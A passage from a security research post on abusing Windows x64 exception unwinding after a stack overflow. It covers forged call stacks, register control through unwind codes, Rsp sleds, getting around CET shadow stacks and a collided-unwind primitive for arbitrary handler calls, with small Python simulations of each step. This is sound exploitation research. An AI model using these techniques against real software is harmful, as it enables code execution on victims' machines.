<!--kg-card-end: markdown--><p>There is an enormous amount of attack surface here. Sure, in the context of 64-bit applications, we will generally be limited to legitimate exception handlers and <code>UNWIND_INFO</code> structures. This is similar to how, with ROP, we are stuck executing the epilogs of legitimate functions as &quot;gadgets&quot;. As an attacker with a stack overflow vulnerability, however, since we can overwrite the call stack with whatever we want, we have <strong>complete control over <em>what</em> legitimate functions are used in the unwinding process and the <em>order</em> in which they are used</strong>.</p><p>How? In our trivial example, we modified the caller of our function <em>with</em> a cookie check to be a legitimate function that has an exception handler <em>without</em> a cookie check. Why stop at adding only one function to the call stack? Why not leverage unwind operations to modify registers to use untrusted values from the stack we control? This is where things start to get interesting. Let&apos;s break these attacks down.</p><h3 id="what-can-we-do-in-rtldispatchexception-with-control-over-the-stack">What Can We Do in <code>RtlDispatchException</code> with Control over the Stack?</h3><p>The first half of exception dispatching is to &quot;virtually unwind&quot; the stack in <code>RtlDispatchException</code>, calling exception handlers as we encounter them. As an attacker with influence over the stack, we can dictate the legitimate functions that <code>RtlDispatchException</code> will use when &quot;virtually unwinding&quot;. So what does that let us do?</p><p>In the context of Windows binaries, we often deal with the C-specific language handler, where functions can specify what exceptions they want to catch with an exception filter. 
Remember that the C-specific exception handlers (jump targets) are triggered via <code>RtlUnwind</code>, which is outside the scope of <code>RtlDispatchException</code>.</p><p>Unfortunately, since the <code>CONTEXT</code> record we can influence during &quot;virtual unwinding&quot; isn&apos;t used anywhere outside of this function, there is not much we can do in <code>RtlDispatchException</code> <strong>alone</strong> other than trigger a &quot;desirable&quot; C-specific exception handler (jump target) for unwinding.</p><p>To trigger a legitimate function&apos;s C-specific exception handler (jump target), we face two main requirements:</p><!--kg-card-begin: markdown--><ol>
<li>We need to know the address of the legitimate function (i.e. by knowing where the module is located).
<ul>
<li>There is a slight exception we&apos;ll discuss later: we can leverage a partial return address overwrite to access the functions in the same module as what&apos;s already on our call stack.</li>
</ul>
</li>
<li>The function&apos;s exception filter (handler address) needs to be 1 or return <code>EXCEPTION_EXECUTE_HANDLER</code> for our exception code.</li>
</ol>
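To make requirement #2 concrete, here is a small sketch that parses a raw `SCOPE_TABLE_AMD64` blob (the struct layout shown later in this article) and checks whether a candidate fake return address lands in a scope whose filter is the constant 1. The helper name and the example table are made up for illustration:

```python
import struct

# Hypothetical helper: given the raw bytes of a SCOPE_TABLE and a candidate
# fake return address (as an RVA), decide whether that address falls inside a
# scope whose filter is the constant 1 (always EXCEPTION_EXECUTE_HANDLER).
def find_reachable_jump_target(scope_table_bytes, fake_return_rva):
    (count,) = struct.unpack_from("<I", scope_table_bytes, 0)
    for i in range(count):
        begin, end, handler, jump_target = struct.unpack_from(
            "<4I", scope_table_bytes, 4 + i * 16
        )
        # The fake return address must land inside the scope bounds, and the
        # filter must unconditionally execute the handler for us to reach
        # jump_target without also controlling the filter's logic.
        if begin <= fake_return_rva < end and handler == 1:
            return jump_target
    return None

# One scope record: [0x1000, 0x1100) with filter == 1 and jump target 0x1150.
table = struct.pack("<I", 1) + struct.pack("<4I", 0x1000, 0x1100, 1, 0x1150)
print(hex(find_reachable_jump_target(table, 0x1040)))
```

This is why the fake return address must point <em>inside</em> the protected scope, not merely at the function's entry point.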
<!--kg-card-end: markdown--><p>Once we meet these requirements, the next step is to figure out where to write our &quot;fake return address&quot; on the stack. Our goal is to trick the unwinding process into thinking the function with our desired exception handler &quot;called&quot; the function where we generated an exception; hence it should be the one to handle our exception.</p><p>For our first parent caller, knowing the location to write is easy: it&apos;s just where the actual return address for the previous function is. Once we overwrite the first return address, however, we need to do some math.</p><pre><code>[RUNTIME_FUNCTION]
...
    [UNWIND_INFO]
    ... 
    Unwind codes: .ALLOCSTACK 0x70; .PUSHREG R15; .PUSHREG R14; .PUSHREG R13; .PUSHREG R12; .PUSHREG RDI; .PUSHREG RSI; .PUSHREG RBX
</code></pre><p>Let&apos;s go through a quick example with <code>ntdll!RtlQueryAtomInAtomTable</code>. Imagine we replaced the first caller on the stack with an address to <code>RtlQueryAtomInAtomTable</code>. Where would we write the second caller&apos;s return address?</p><p>Each function&apos;s prolog is going to impact the stack differently. We have to account for each unwind operation that modifies <code>Rsp</code>. In this case, we have a stack allocation of 0x70 bytes (<code>sub rsp, 0x70</code>) and 7 registers being pushed (<code>push r??</code>). Assume our offset is relative to the <code>location of the previous return address + 0x8</code>. To calculate the total stack allocation for <code>RtlQueryAtomInAtomTable</code>, we do <code>0x70 + 0x8*7 = 0xA8</code>, where 0x70 is our stack allocation, and 0x8*7 accounts for each register that was pushed. This means our next return address would be written to <code>Rsp + 0xA8</code> following the previous one.</p><p>As I mentioned earlier, you can look at the <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L114">source code of RtlDispatchException</a> in the leaked Windows Research Kernel yourself. Additionally, <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L960">here is the specific code</a> that will tell you exactly how each unwind operation modifies <code>Rsp</code>.</p><p>Now that we know how to do this math, we can chain together an unlimited amount of functions on the call stack- while accounting for how they impact <code>Rsp</code>. However, before we get into <code>RtlUnwind</code>, there is one more small step to understand.</p><pre><code class="language-c">typedef struct _SCOPE_TABLE_AMD64 {
    DWORD Count;
    struct {
        DWORD BeginAddress;
        DWORD EndAddress;
        DWORD HandlerAddress;
        DWORD JumpTarget;
    } ScopeRecord[1];
} SCOPE_TABLE_AMD64, *PSCOPE_TABLE_AMD64;
</code></pre><p>Our first requirement was to know the location of the legitimate function protected by our desirable exception handler. Writing this function&apos;s address to the call stack alone is not sufficient. Remember that the scope record structure specifies what part of the function is protected by a given filter/handler with the <code>BeginAddress</code>/<code>EndAddress</code> fields. To ensure we trigger our desired <code>JumpTarget</code> handler, we need to add <em>at least</em> the <code>BeginAddress</code> of the relevant scope to our image base rather than only the function offset.</p><p>To recap, <code>RtlDispatchException</code> will virtually unwind through each function in our fake call stack. Once the entry with our desirable exception handler is reached, <code>__C_specific_handler</code> is called. Then, since our return address is within the scope bounds, the exception filter is called, which returns <code>EXCEPTION_EXECUTE_HANDLER</code> (or is 1, which means the same thing). This will trigger a final call to <code>RtlUnwind</code>, responsible for unwinding the stack and resuming execution at our exception handler!</p><p>The following section is where we&apos;ll get into some fun bits and explore why we&apos;d want to include other functions (including those without exception handlers) before our final target.</p><h3 id="what-can-we-do-in-rtlunwind-with-control-over-the-stack">What Can We Do in <code>RtlUnwind</code> with Control over the Stack?</h3><p>Now that we understand how to create a fake call stack with any function we want and how to trigger <code>RtlUnwind</code> from the context of an exception, let&apos;s get into some primitives.</p><p>A quick reminder about the differences between <code>RtlDispatchException</code> and <code>RtlUnwind</code>. 
In <code>RtlDispatchException</code>, the <code>CONTEXT</code> structure being modified does not impact anything other than the virtual unwind process itself, whereas in <code>RtlUnwind</code>, changes will be reflected when execution continues. Also, in <code>RtlDispatchException</code>, only functions with <code>UNW_FLAG_EHANDLER</code> in their unwind info structure will have their <code>ExceptionHandler</code> called, whereas in <code>RtlUnwind</code>, the same is true with the <code>UNW_FLAG_UHANDLER</code> flag.</p><p>The four primary &quot;primitives&quot; we can leverage in <code>RtlUnwind</code> are:</p><!--kg-card-begin: markdown--><ol>
<li>We can resume execution at any C-specific exception handler (jump target) whose location we know and whose exception filter we&apos;ve passed.</li>
<li>We can read untrusted values into registers from the stack <em>and</em> these values will be reflected once execution is resumed at our C-specific exception handler.</li>
<li>We can influence the offset on the stack we resume execution at.</li>
<li>We can execute any termination/unwind handler we want on our way to the unwind destination.
<ul>
<li>For example, before reaching our desired exception handler (jump target), we could trigger the <code>__finally</code> blocks for any function we know the address of. This can lead to scenarios like a use-after-free or double-free.</li>
</ul>
</li>
</ol>
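Building such a fake call stack requires the frame-size arithmetic from the earlier `RtlQueryAtomInAtomTable` example (`0x70 + 0x8*7 = 0xA8`). Here is a small sketch of that bookkeeping; the `(op, arg)` tuples are a simplification for illustration, not real pefile output:

```python
def frame_rsp_delta(unwind_codes):
    """Bytes Rsp moves when one frame is unwound (excluding the ret itself)."""
    delta = 0
    for op, arg in unwind_codes:
        if op == "ALLOCSTACK":
            delta += arg          # sub rsp, arg  ->  add rsp, arg on unwind
        elif op == "PUSHREG":
            delta += 8            # push reg      ->  pop reg on unwind
    return delta

def layout_fake_stack(first_return_slot, frames):
    """Return the stack offset of each fake return address in the chain."""
    slots = [first_return_slot]
    for codes in frames[:-1]:
        # next slot = previous slot + 8 (consumed return address)
        #           + everything this frame's prolog did to Rsp
        slots.append(slots[-1] + 8 + frame_rsp_delta(codes))
    return slots

rtl_query_atom = [("ALLOCSTACK", 0x70)] + [("PUSHREG", r) for r in
                 ("R15", "R14", "R13", "R12", "RDI", "RSI", "RBX")]
print(hex(frame_rsp_delta(rtl_query_atom)))  # 0xa8
print([hex(s) for s in layout_fake_stack(0x0, [rtl_query_atom, rtl_query_atom])])
```

Chaining more frames is just repeating this addition, which is why the technique scales to arbitrarily long fake call stacks.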
<!--kg-card-end: markdown--><p>We&apos;ve covered how to do #1 already in the previous section. What about the other primitives?</p><h4 id="modify-any-register-we-want">Modify Any Register We Want</h4><p>Earlier I said there were reasons we would want to include functions on our call stack <em>prior</em> to the function with our desirable exception handler. We can leverage the unwind operations of any function we know the location of to modify registers before we resume execution at a desirable exception handler.</p><p>How? Many functions do not have an exception handler defined, but they still have a runtime function / unwind info entry to allow them to be unwound. The reason unwind operations can provide us with very powerful primitives is because they are designed to restore untrusted data from the stack into registers to which we otherwise wouldn&apos;t have access.</p><p>For example, take the <code>UWOP_PUSH_NONVOL</code> operation that represents <code>PUSH REGISTER</code> instructions. Let&apos;s say our fake call stack had two functions, one that has no handler with a <code>UWOP_PUSH_NONVOL</code> unwind operation and one that has our desired exception handler. When the first function is unwound, <code>RtlVirtualUnwind</code> in <code>RtlUnwind</code> will replace the value of <code>REGISTER</code> with an untrusted value from the stack. By including this function in our call stack, we have direct control over the value of <code>REGISTER</code> when execution resumes at our exception handler. 
Even more powerful: we can chain together multiple functions with desirable unwind operations on the call stack to ultimately influence the value of almost every register!</p><p>Although you can see what each unwind operation does in the <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L960">leaked Windows Research Kernel</a>, I&apos;ve created a small summary of the primitives they give us below:</p><!--kg-card-begin: markdown--><ol>
<li><code>UWOP_PUSH_NONVOL</code> - Pulls an untrusted value from the stack and places it into a register specified by the <code>OpInfo</code> field.</li>
<li><code>UWOP_ALLOC_LARGE</code> / <code>UWOP_ALLOC_SMALL</code> - Increments <code>Rsp</code> by a constant value.</li>
<li><code>UWOP_SET_FPREG</code> - Sets <code>Rsp</code> to the value of the register specified by the <code>FrameRegister</code> field, minus 16 * the <code>FrameOffset</code> field. Both fields come from the unwind info structure.</li>
<li><code>UWOP_SAVE_NONVOL</code> / <code>UWOP_SAVE_NONVOL_FAR</code> - Reads a value from a constant offset on the stack into the register specified by the <code>OpInfo</code> field.</li>
<li><code>UWOP_PUSH_MACHFRAME</code> - Pulls an untrusted value from the stack and places it into <code>Rip</code>. <code>Rsp</code> is then replaced with an untrusted value from offset 0x18 of the current stack.
<ul>
<li>Note that <code>Rip</code> is replaced at the end of <code>RtlUnwind</code> (unless your exception code is <code>STATUS_UNWIND_CONSOLIDATE</code>), so no, you can&apos;t just restore execution at some arbitrary address from the stack.</li>
</ul>
</li>
</ol>
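The primitives above can be made concrete with a toy unwinder. This sketch is loosely modeled on `RtlpUnwindPrologue` from the leaked WRK but is heavily simplified; `stack` maps stack offsets to attacker-controlled 64-bit values:

```python
def unwind_frame(context, stack, unwind_codes):
    """Apply a frame's unwind operations to a register context."""
    for op, arg in unwind_codes:
        if op == "UWOP_ALLOC_SMALL":
            context["Rsp"] += arg             # undo: sub rsp, arg
        elif op == "UWOP_PUSH_NONVOL":
            # undo a push: "pop" an attacker-controlled value into the register
            context[arg] = stack[context["Rsp"]]
            context["Rsp"] += 8
    return context

# Slots the unwinder will "pop" from: we wrote these during the overflow.
stack = {0x70: 0x4141414141414141, 0x78: 0x4242424242424242}
codes = [("UWOP_ALLOC_SMALL", 0x70),
         ("UWOP_PUSH_NONVOL", "R15"),
         ("UWOP_PUSH_NONVOL", "RBX")]
ctx = unwind_frame({"Rsp": 0x0}, stack, codes)
# R15 and RBX now hold values read straight from our fake stack.
print(hex(ctx["R15"]), hex(ctx["RBX"]), hex(ctx["Rsp"]))
```

Chaining several such frames before the final jump target is how almost every nonvolatile register can be seeded with attacker-chosen values.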
<!--kg-card-end: markdown--><p>As you can see, these operations provide powerful primitives to modify the state of registers before restoring at a legitimate exception handler. Of course, you would need to find these operations already present in an existing function&apos;s unwind info structure, but given that every function has an unwind info structure, you have a lot to choose from.</p><p>Another side effect to worry about is &quot;what if I only want to replace a few registers, but my unwind info structure contains operations I don&apos;t want?&quot;. Fortunately, there is a trick we can use to get around this.</p><pre><code class="language-c">typedef union _UNWIND_CODE {
	struct {
		unsigned char CodeOffset;
		unsigned char UnwindOp : 4;
		unsigned char OpInfo : 4;
	};
	unsigned short FrameOffset;
} UNWIND_CODE, *PUNWIND_CODE;
</code></pre><p>When unwind operations are enumerated, it&apos;s not as simple as &quot;just enumerate every operation if the exception address is in this function&quot;. For example, what happens if an exception occurs in the prolog?</p><p>To account for this exists the <code>CodeOffset</code> field of each <code>UNWIND_CODE</code> (unwind operation). An unwind operation is only executed if the address inside the function minus the function address itself is greater than or equal to the <code>CodeOffset</code>. This way, if an exception occurred in the prolog, only unwind operations corresponding to instructions that have already been executed would be processed.</p><p>This functionality is helpful because we can specify which unwind operation we want to start with!</p><pre><code>	[UNWIND_INFO]
	Unwind codes:
		0x10: .ALLOCSTACK 0x70
		0xc: .PUSHREG R15
		0xa: .PUSHREG R14
		0x8: .PUSHREG R13
		0x6: .PUSHREG R12
		0x4: .PUSHREG RDI
		0x3: .PUSHREG RSI
		0x2: .PUSHREG RBX
</code></pre><p>For example, above, the unwind operations for <code>ntdll!RtlQueryAtomInAtomTable</code> are prepended with their <code>CodeOffset</code> fields. If we wanted to only replace the value of <code>RBX</code>, we place the address of <code>RtlQueryAtomInAtomTable</code> + 0x2 on the stack. This works because <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L950">RtlpUnwindPrologue</a> will assume an exception occurred at the <code>PUSH RBX</code> instruction, thus only process that unwind operation.</p><h4 id="influence-the-stack-pointer">Influence the Stack Pointer</h4><p>Another useful primitive is the ability to modify the stack pointer. Here are the most prominent reasons this would be helpful:</p><!--kg-card-begin: markdown--><ol>
<li>If we want to return to a legitimate function on the call stack that we haven&apos;t modified after faking the functions &quot;below it&quot;, we need to align <code>Rsp</code> with that legitimate function&apos;s return address on the stack.
<ul>
<li>If we are executing a desirable exception handler (jump target) who will <code>ret</code> into a legitimate caller, we&apos;d need to account for the changes the handler will make to the stack.</li>
</ul>
</li>
<li>If we are using a partial return address overwrite (i.e. because we don&apos;t have a leak), then controlling <code>Rsp</code> would let us choose which return address on the legitimate call stack we want to perform an overwrite on.
<ul>
<li>Besides having a more comprehensive selection of modules to choose from, maybe we control the local variables for some caller and can find an exception handler that reads from these local variables.</li>
</ul>
</li>
</ol>
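As a sketch of reason #2, suppose we know the layout of the legitimate call stack (e.g. from reversing the target) but have no address leak. The following toy helper (the module names and slot offsets are invented for illustration) computes how far `Rsp` must be advanced so the unwinder consumes the return-address slot we want to partially overwrite:

```python
def rsp_adjustment(call_stack, current_rsp, wanted_module):
    """How many bytes Rsp must advance to reach the first return-address slot
    pointing into wanted_module. call_stack is a list of (slot_offset, module)."""
    for slot_offset, module in call_stack:
        if module == wanted_module and slot_offset >= current_rsp:
            return slot_offset - current_rsp
    return None

# Hypothetical legitimate stack: offsets of each return-address slot and the
# module that return address points into.
legit_stack = [(0x00, "app.exe"), (0x28, "kernel32.dll"), (0x90, "ntdll.dll")]
print(hex(rsp_adjustment(legit_stack, 0x8, "ntdll.dll")))  # 0x88
```

Once `Rsp` is aligned with that slot, a partial overwrite of its low bytes retargets execution within the same module, with no leak required.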
<!--kg-card-end: markdown--><p>The first method of influencing <code>Rsp</code> does require leaks, but it&apos;s relatively straightforward. As previously discussed, each function&apos;s unwind operations will impact <code>Rsp</code> differently. By placing legitimate functions on the call stack, we can use these unwind operations to increment <code>Rsp</code> by any amount we want. We can control this even further by using the previous trick of placing our return address in the middle of a prolog (to exclude certain unwind operations).</p><p>The second method of influencing <code>Rsp</code> without leaks is slightly more nuanced. When I was reading <a href="http://www.nynaeve.net/?p=105">part 3</a> of Ken Johnson&apos;s series explaining how 64-bit exception handling worked on Windows, this paragraph caught my eye:</p><blockquote>If RtlUnwindEx encounters a &quot;leaf function&quot; during the unwind process (a leaf function is a function that does not use the stack and calls no subfunctions), then it is possible that there will be no matching RUNTIME_FUNCTION entry for the current call frame returned by RtlLookupFunctionEntry. In this case, RtlUnwindEx assumes that the return address of the current call frame is at the current value of Rsp (and that the current call frame has no unwind or exception handlers). Because the x64 calling convention enforces hard rules as to what functions without RUNTIME_FUNCTION registrations can do with the stack, this is a valid assumption for RtlUnwindEx to make (and a necessary assumption, as there is no way to call RtlVirtualUnwind on a function with no matching RUNTIME_FUNCTION entry). 
The current call frame&apos;s value of Rsp (in the context record describing the current call frame, not the register value of rsp itself within RtlUnwindEx) is dereferenced to locate the call frame&apos;s return address (Rip value), and the saved Rsp value is then adjusted accordingly (increased by 8 bytes).</blockquote><p>Ken described the logic that occurs during unwinding when a return address is retrieved from the stack that does not have a corresponding function entry. This is helpful for our purposes because it means that if we put an invalid address on the stack, the unwinding process will consider it a &quot;leaf function&quot; (since it can&apos;t find a function entry) and skip over it! This allows us to increment <code>Rsp</code> by 8 by including invalid addresses in our call stack.</p><p>I ran into an issue when I was testing this out myself. I had placed one constant address on the stack repeatedly, hoping that <code>Rsp</code> would keep incrementing by 8. What happened instead was that after the first instance of the invalid constant, unwinding failed. I found the answer while reading through the <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L409">WRK leak of RtlDispatchException</a>:</p><pre><code class="language-c">    //
    // If the old control PC is the same as the return address,
    // then no progress is being made and the function tables are
    // most likely malformed.
    //
    if (ControlPc == *(PULONG64)(ContextRecord1.Rsp)) {
        break;
    }
</code></pre><p>What was happening was that the unwinding process included a check to make sure the previous control point did not match the next control point. So, to fix the behavior of incrementing <code>Rsp</code> as many times as I wanted, all I had to do was swap between two invalid constants. For example, if I wanted to increment <code>Rsp</code> by 0x20, my call stack would look like the following:</p><pre><code>0x1111111111111111
0x2222222222222222
0x1111111111111111
0x2222222222222222
</code></pre><p>This is helpful when we don&apos;t have a leak because we can create a &quot;sled&quot; to get to any other legitimate return address on the stack.</p><h3 id="summary">Summary</h3><p>To summarize the advanced variants of Exception Oriented Programming here is what we can do as an attacker with a stack overflow vulnerability:</p><!--kg-card-begin: markdown--><ol>
<li>We can restore execution at any C-specific exception handler (jump target) we know the location of.</li>
<li>We can directly control the state of registers when an exception is handled.
<ul>
<li>This could be leveraged to corrupt the caller&apos;s state when our exception handler returns to a given function.</li>
</ul>
</li>
<li>We can call the termination handler (<code>__finally</code> block) in any function we know the location of.
<ul>
<li>This could be used to trigger a use-after-free or double-free scenario.</li>
</ul>
</li>
</ol>
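To tie the leak-less pieces together, here is a toy version of the leaf-function `Rsp` "sled" and the WRK progress check described earlier. It is a simulation only: each stack slot here is one machine word, and every value is treated as an address with no matching function entry:

```python
def run_sled(stack_words):
    """Simulate unwinding through "leaf" frames: each slot bumps Rsp by 8,
    but the unwinder aborts if no progress is made (ControlPc == *Rsp)."""
    rsp = 0
    control_pc = None
    while rsp < len(stack_words):
        word = stack_words[rsp]
        if word == control_pc:    # no progress: function tables look malformed
            return rsp * 8, "aborted"
        control_pc = word
        rsp += 1                  # leaf frame: Rsp advances one slot (8 bytes)
    return rsp * 8, "ok"

# Repeating one constant trips the progress check after the first slot...
print(run_sled([0x1111111111111111] * 4))
# ...while alternating two constants slides Rsp the whole way.
print(run_sled([0x1111111111111111, 0x2222222222222222] * 2))
```

This mirrors the alternating `0x1111.../0x2222...` call stack shown above: alternation is purely there to defeat the progress check.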
<!--kg-card-end: markdown--><p>Without any leaks, we would be limited to partial return address overwrites. Fortunately, we can influence <code>Rsp</code> such that we can overwrite any address on the stack rather than only our direct parent. However, the primary method of controlling what values are used in unwind operations would be to overwrite the return address of a function whose local variables we control. This is because we cannot overwrite the local variables without knowing the complete return address.</p><h3 id="does-this-work-with-cet-shadow-stacks">Does This Work with CET / Shadow Stacks?</h3><p>One of the considerable benefits of these attacks is that we only hit a return instruction relevant to shadow stacks when our desired exception handler returns. Otherwise, the unwinding process blindly trusts addresses from the stack we control.</p><p>Still, the return instruction in the exception handler could pose a problem; what can we do to ensure we don&apos;t crash at that point?</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/WgORSPV.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>First, whenever a new function on your call stack is enumerated by the unwinding process, a return address is &quot;popped&quot; from the shadow stack. This is important because when you unwind to a function <code>N</code> return addresses away, you need to get rid of those <code>N</code> return addresses on the shadow stack to ensure that the next <code>ret</code> instruction will match what&apos;s on the shadow stack.</p><p>This is a useful &quot;feature&quot; that we can abuse because we can cause corruption in the state of an application by returning to any function in the call stack we want to. 
By chaining together fake exception handlers, we can &quot;pop&quot; the shadow stack until we reach a desired parent function and use a jump target&apos;s <code>ret</code> instruction to return to it early.</p><p>CET does not verify that your return address is at the same stack offset where it was initially placed. Therefore, as long as the value matches what&apos;s on the shadow stack, it does not matter where on the stack the return address is retrieved from.</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">In those CET times: It&apos;s possible to return in unwinding to any address in the SSP, causing a &quot;type confusion&quot; between stack frames ;)<br>I really like the different variants of this concept <a href="https://t.co/I44p8uVAl2">https://t.co/I44p8uVAl2</a>:) Type confusions are on fire! (stack frames, objc for PAC bypass) <a href="https://t.co/aZPcmb6XQb">https://t.co/aZPcmb6XQb</a></p>&#x2014; Saar Amar (@AmarSaar) <a href="https://twitter.com/AmarSaar/status/1219711378409361409?ref_src=twsrc%5Etfw">January 21, 2020</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>This design weakness has been known for at least two years, however. Another security researcher, <a href="https://twitter.com/amarsaar">Saar Amar</a>, highlighted how an attacker could cause a &quot;type confusion&quot; condition even with CET by unwinding to a desired function already on the call stack.</p><p>For example, imagine a parent function responsible for initializing a structure. By returning to a function above it mid-way during the initialization process, that parent may end up using an incomplete structure.</p><p>If you have a leak of the module location, you can predict the legitimate return address on the shadow stack (after the popping occurs) and put it on the normal stack where the following return address will be retrieved from. If you don&apos;t know the location of the legitimate function and can avoid overflowing it on the stack, you can create a fake call stack that will increment <code>Rsp</code> right up to that legitimate address.</p><h1 id="blast-from-the-past">Blast from the Past</h1><h2 id="background-2">Background</h2><p><a href="http://www.nynaeve.net/?p=107">Part 5</a> of Ken Johnson&apos;s series on 64-bit exception handling discussed how certain edge cases known as &quot;collided unwinds&quot; were addressed. To give a high-level overview of what collided unwinds are, here is a good quote from Ken&apos;s blog:</p><blockquote>A collided unwind occurs when an unwind handler initiates a secondary unwind operation in the context of an unwind notification callback. In other words, a collided unwind is what occurs when, in the process of a stack unwind, one of the call frames changes the target of an unwind. This has several implications and requirements in order to operate as one might expect:<br>1. Some unwind handlers that were on the original unwind path might no longer be called, depending on the new unwind target.<br>2. The current unwind call stack leading into RtlUnwindEx will need to be interrupted.<br>3. 
The new unwind operation should pick up where the old unwind operation left off. That is, the new unwind operation shouldn&apos;t start unwinding the exception handler stack; instead, it must unwind the original stack, starting from the call frame after the unwind handler which initiated the new unwind operation.</blockquote><p>An even more straightforward way of thinking about a collided unwind is that it occurs when an unwind handler calls <code>RtlUnwind</code> itself. To solve this problem, Ken describes Microsoft&apos;s &quot;elegant&quot; solution: any call to an unwind handler is executed through a helper function, <code>RtlpExecuteHandlerForUnwind</code>.</p><pre><code class="language-c">typedef struct _DISPATCHER_CONTEXT {
    ULONG64 ControlPc;
    ULONG64 ImageBase;
    PRUNTIME_FUNCTION FunctionEntry;
    ULONG64 EstablisherFrame;
    ULONG64 TargetIp;
    PCONTEXT ContextRecord;
    PEXCEPTION_ROUTINE LanguageHandler;
    PVOID HandlerData;
    struct _UNWIND_HISTORY_TABLE *HistoryTable;
    ULONG ScopeIndex;
    ULONG Fill0;
} DISPATCHER_CONTEXT, *PDISPATCHER_CONTEXT;
</code></pre><p>When <code>RtlpExecuteHandlerForUnwind</code> is called by <code>RtlUnwindEx</code>, <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/XCPTMISC.ASM#L243">it saves a pointer</a> to the current <code>DISPATCHER_CONTEXT</code> structure on the stack. As we can see above, this structure contains the entire internal state of <code>RtlUnwindEx</code>.</p><p>In an earlier section, we dumped the exception handlers for functions in ntdll, where the <code>__GSHandlerCheck*</code> variants were discovered. One of the other exception handlers I skipped over was <code>RtlpUnwindHandler</code>. This exception handler is actually used to protect <code>RtlpExecuteHandlerForUnwind</code>.</p><p>This is where the &quot;elegant&quot; solution kicks in. When an unwind handler calls <code>RtlUnwindEx</code> and the unwinding process occurs again, <code>RtlUnwindEx</code> calls the unwind handler of <code>RtlpExecuteHandlerForUnwind</code>, which is <code>RtlpUnwindHandler</code>. What does this handler do? <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/XCPTMISC.ASM#L172">It overwrites</a> the current <code>DISPATCHER_CONTEXT</code> structure with the saved <code>DISPATCHER_CONTEXT</code> structure and returns <code>ExceptionCollidedUnwind</code>. When an unwind handler returns this result, <code>RtlUnwindEx</code> uses the overwritten values <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L770">to replace its internal unwinding state</a>. This allows the unwinding process to resume where it left off without any fuss.</p><h2 id="an-overpowered-primitive">An Overpowered Primitive</h2><blockquote>...
there is <strong>not much we can do</strong> in <code>RtlDispatchException</code> alone other than trigger a &quot;desirable&quot; C-specific exception handler (jump target) for unwinding ...</blockquote><p>When I was covering what we could do with control over the stack in <code>RtlDispatchException</code>, remember how I said, &quot;not much&quot;?</p><p>I lied.</p><p>While reading the leaked source for <code>RtlDispatchException</code>, I noticed that it too <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L372">contained code</a> to handle the <code>ExceptionCollidedUnwind</code> result returned by exception handlers. This may have been added to cover the unlikely edge case where an exception occurs, <code>RtlUnwindEx</code> is called, an unwind handler is called, and another exception occurs.</p><p>This is where I got a wild idea: as an attacker with a stack overflow vulnerability, we can modify the call stack to whatever we want, right? If we knew the location of ntdll, <strong>couldn&apos;t we make it seem like the function we are causing an exception in was <em>called by</em> <code>RtlpExecuteHandlerForUnwind</code>?</strong></p><p>If that were true, then since <code>RtlpUnwindHandler</code> grabs the <code>DISPATCHER_CONTEXT</code> structure pointer from the stack, couldn&apos;t we use any attacker-controlled memory location in the process to overwrite the entire internal state of <code>RtlDispatchException</code> with our own values?</p><pre><code class="language-c">        //
        // The disposition is collided unwind.
        //
        // A collided unwind occurs when an exception dispatch
        // encounters a previous call to an unwind handler. In
        // this case the previous unwound frames must be skipped.
        //
    case ExceptionCollidedUnwind:
        ControlPc = DispatcherContext.ControlPc;
        ImageBase = DispatcherContext.ImageBase;
        FunctionEntry = DispatcherContext.FunctionEntry;
        EstablisherFrame = DispatcherContext.EstablisherFrame;
        RtlpCopyContext(&amp;ContextRecord1,
                        DispatcherContext.ContextRecord);

        RtlVirtualUnwind(UNW_FLAG_EHANDLER,
                         ImageBase,
                         ControlPc,
                         FunctionEntry,
                         &amp;ContextRecord1,
                         &amp;HandlerData,
                         &amp;EstablisherFrame,
                         NULL);

        ContextRecord1.Rip = ControlPc;
        ExceptionRoutine = DispatcherContext.LanguageHandler;
        HandlerData = DispatcherContext.HandlerData;
        HistoryTable = DispatcherContext.HistoryTable;
        ScopeIndex = DispatcherContext.ScopeIndex;
        Repeat = TRUE;
        break;
</code></pre><p>Knowing the location of ntdll <em>and</em> some memory we control certainly isn&apos;t trivial, but the impact is astronomical. For example, in the (slightly corrected) WRK excerpt above, when the <code>ExceptionCollidedUnwind</code> result is returned, the overwritten <code>DispatcherContext</code> variable is used to update the current <code>Rip</code>, image base, runtime function entry, <code>CONTEXT</code> record, the <code>UNWIND_HISTORY_TABLE</code>, <strong>and even a pointer that specifies an ExceptionRoutine to immediately call</strong>. All of this is controlled by an attacker with a stack overflow vulnerability.</p><p>See the <code>Repeat</code> variable getting set to <code>TRUE</code>? Right after the <code>break</code>, the while loop for calling an exception handler repeats <em>without</em> calling <code>RtlLookupFunctionEntry</code>, and the attacker-controlled <code>ExceptionRoutine</code> is passed to <code>RtlpExecuteHandlerForException</code>, whose second argument (<code>RDX</code>/<code>EstablisherFrame</code>) is entirely controlled by the attacker as well.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/eGGwsH6.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>To add insult to injury, the call inside of <code>RtlpExecuteHandlerForException</code> to the attacker-controlled <code>ExceptionRoutine</code> is done <em>without</em> a Control Flow Guard (or xFG) check, meaning we can call into the middle of any function or any unaligned address.</p><p>I can&apos;t help but draw parallels to the x86 SEH hijacking attacks from 15+ years ago, where an attacker could overflow the stack and replace the exception handler that would be called. With this primitive, we can achieve the same result with even more control.</p><p>To give you an idea of what&apos;s possible with the variables we can 